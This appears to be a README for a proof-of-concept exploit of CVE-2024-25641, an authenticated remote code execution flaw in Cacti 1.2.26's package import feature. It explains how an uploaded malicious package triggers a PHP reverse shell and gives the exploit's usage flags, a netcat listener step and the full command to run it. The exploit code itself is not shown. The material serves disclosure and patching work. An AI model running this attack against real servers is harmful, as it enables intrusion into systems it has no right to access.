CVE-2024-25641

# Exploit Title: Cacti 1.2.26 - RCE (Authenticated)
# Date: 06/01/2025
# Exploit Author: D3Ext
# Vendor Homepage: https://cacti.net/
# Software Link: https://github.com/Cacti/cacti/archive/refs/tags/release/1.2.26.zip
# Version: 1.2.26
# Tested on: Kali Linux 2024
# CVE: CVE-2024-25641

Explanation

This repository contains a POC (Proof of Concept) of the CVE-2024-25641 vulnerability, which affects to Cacti 1.2.26 version. This vulnerability is exploitable through the "Package Import" feature, allows authenticated users having the "Import Templates" permission to execute arbitrary PHP code on the web server. The vulnerability is located within the import_package() function defined into the /lib/import.php script. This exploit uses a PHP reverse shell which is triggered once the malicious plugin is uploaded.

Usage

usage: exploit.py [-h] --url URL --user USER --password PASSWORD --lhost LHOST --lport LPORT [--verbose]

CVE-2024-25641 - Cacti 1.2.26 Authenticated RCE

options:
  -h, --help           show this help message and exit
  --url URL            URL of the Cacti web root
  --user USER          username to log in
  --password PASSWORD  password of the username
  --lhost LHOST        local host to receive the reverse shell
  --lport LPORT        local port to receive the reverse shell
  --verbose            enable verbose

Start a netcat listener and then execute the exploit like this:

python3 exploit.py --url <URL> --user <username> --password <password> --lhost <local_host> --lport <local_port>

Demo

References

https://github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88
https://nvd.nist.gov/vuln/detail/CVE-2024-25641
https://vuldb.com/?id.263978
https://github.com/5ma1l/CVE-2024-25641
https://github.com/Safarchand/CVE-2024-25641

License

This project is under MIT license

Copyright © 2025, D3Ext